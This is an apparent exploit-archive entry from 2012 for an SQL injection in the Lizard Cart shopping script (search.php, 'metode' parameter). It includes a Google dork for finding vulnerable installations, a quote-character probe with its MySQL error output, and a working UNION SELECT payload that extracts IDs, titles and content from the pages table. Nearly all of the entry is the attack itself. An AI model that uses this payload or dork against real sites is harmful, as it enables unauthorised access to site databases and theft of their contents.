lizard cart SQLi (search.php)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : lizard cart SQLi (search.php)
# Published : 2012-03-05
# Author :
# Previous Title : RazorCMS <= 1.2.1 STABLE File Upload Vulnerability
# Next Title : PBLang local file include vulnerability

# Exploit Title: [lizard cart SQLi (search.php)]
# Google Dork: [inurl:search.php+intitle:"Lizard Cart"+intext:"Search Results:"]
# Date: [05-03-2012]
# Author: [Number 7]
# Software Link: [http://sourceforge.net/projects/lizardcart/files/latest/download?source=directory]
# Version: [pp104]
# Tested on: [Windows]
_____________________________________________________________________________________________
Usage:

http://localhost/liza/search.php?metode=1'

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:AppServwwwlizasearch.php on line 15

http://localhost/liza/search.php?metode=[SQLi]

search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages--

Demo:
htptp://localhost/liza/search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages--

_____________________________________________________________________________________________